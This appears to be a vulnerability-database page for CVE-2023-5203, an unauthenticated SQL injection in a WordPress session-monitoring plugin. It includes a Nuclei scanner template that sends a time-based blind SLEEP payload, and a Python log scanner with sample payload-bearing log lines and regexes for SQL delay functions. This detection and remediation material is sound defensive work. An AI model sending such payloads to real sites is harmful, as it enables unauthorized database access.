
WP Sessions Time Monitoring Full Automatic <= 1.0.8 - SQL Injection

CVE-2023-5203
Verified

Description

The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via request parameters in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

Severity

Critical

CVSS Score

9.8

Exploit Probability

43%

Published Date

February 24, 2026

Template Author

shivam kamboj

CVE-2023-5203.yaml
id: CVE-2023-5203

info:
  name: WP Sessions Time Monitoring Full Automatic <= 1.0.8 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The WP Sessions Time Monitoring Full Automatic plugin for WordPress is vulnerable to SQL Injection via request parameters in all versions up to, and including, 1.0.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
  impact: |
    Attackers can retrieve sensitive database information without authentication, leading to data breach and privacy violations.
  remediation: |
    Update to version 1.0.9 or later to fix the vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/activitytime/wp-sessions-time-monitoring-full-automatic-108-unauthenticated-sql-injection
    - https://wordpress.org/plugins/activitytime/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5203
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-5203
    epss-score: 0.42933
    epss-percentile: 0.97536
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,activitytime

http:
  - raw:
      - |
        @timeout: 30s
        GET /?id=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%287%29%29%29test%29%20--%20 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
          - 'contains(body, "activitytime_tracker")'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a0047304502210082c9966d186a7849c2f1d3ab217cda95d7e41300dc59097eb0793662d984a47b02206f3e7db0ec6994d4c3d6928df9874212c6b6fa098718f55a0b8333e7cbdd67a7:922c64590222798bb761d5b6d8e72950
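The template above confirms the flaw by sending a single time-based blind payload and matching on a 7-second response delay. From the defender's side, the same payload shape is what shows up in web server access logs when scanners or attackers probe for this bug. The following Python script is an added example (not part of this page or of ProjectDiscovery's template): it parses combined-format access log lines, URL-decodes each query parameter, and flags values that carry a time-based SQL injection primitive (SLEEP, BENCHMARK, WAITFOR DELAY, pg_sleep) behind a quote-and-boolean injection prefix. It generalizes beyond the template's one request by decoding both percent- and plus-encoding, so the page's payload and an equivalently encoded variant are both caught while an innocent parameter that merely contains the word "sleep" is not. The log lines are constructed for the example; the IPs, timestamps and the second payload variant are assumptions, not observed data.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log lines in Apache/nginx combined format (not real traffic).
# Line 2 carries the exact request the Nuclei template sends; line 4 is an assumed
# plus-encoded variant of the same technique; lines 1 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Feb/2026:10:01:02 +0000] "GET /?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [24/Feb/2026:10:01:09 +0000] "GET /?id=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%287%29%29%29test%29%20--%20 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Feb/2026:10:02:00 +0000] "GET /?s=sleep+well HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Feb/2026:10:02:30 +0000] "GET /?id=2%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%285%29%29%29x%29--+ HTTP/1.1" 200 5120 "-" "curl/8.0"
"""

# Combined log format: client IP, identity, user, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Time-delay primitives used by blind SQL injection, matched on the decoded value.
TIME_BASED_SQLI = re.compile(
    r"(?i)(?:\bsleep\s*\(\s*\d+|\bbenchmark\s*\(\s*\d+\s*,|\bwaitfor\s+delay\b|\bpg_sleep\s*\()"
)
# A closing quote or parenthesis followed by AND/OR is the typical injection prefix.
INJECTION_PREFIX = re.compile(r"(?i)['\")]\s*(?:and|or)\b")


def decode_params(target):
    """Return (name, value) pairs from the request target's query string.

    parse_qsl performs percent-decoding and turns '+' into a space, so the
    detection regexes below run on the plain SQL text the database would see."""
    query = urlsplit(target).query
    return parse_qsl(query, keep_blank_values=True)


def classify_request(target):
    """Return a list of (parameter, reason) findings for one request target."""
    findings = []
    for name, value in decode_params(target):
        if TIME_BASED_SQLI.search(value):
            if INJECTION_PREFIX.search(value):
                findings.append((name, "time-based SQLi payload with injection prefix"))
            else:
                findings.append((name, "time-based SQLi function in parameter"))
    return findings


def scan_log(text):
    """Scan combined-format log text and return one dict per suspicious request.

    A hit means an attempt was logged; whether it succeeded still has to be
    judged from response timing or the application side, not from the log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["findings"])
```

Running the script against the constructed log reports the two probing requests and ignores the benign ones. Because matching happens after decoding, the same rule covers `%20`, `+` and mixed-case spellings; pairing it with a response-time field (where the web server logs one) would let you distinguish a probe that actually delayed the page from one the application rejected.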
CVSS Metrics

CVSS Score: 9.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2023-5203
CWE ID: CWE-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/activitytime/wp-sessions-time-monitoring-full-automatic-108-unauthenticated-sql-injection
https://wordpress.org/plugins/activitytime/
https://nvd.nist.gov/vuln/detail/CVE-2023-5203

Remediation Steps

Update to version 1.0.9 or later to fix the vulnerability.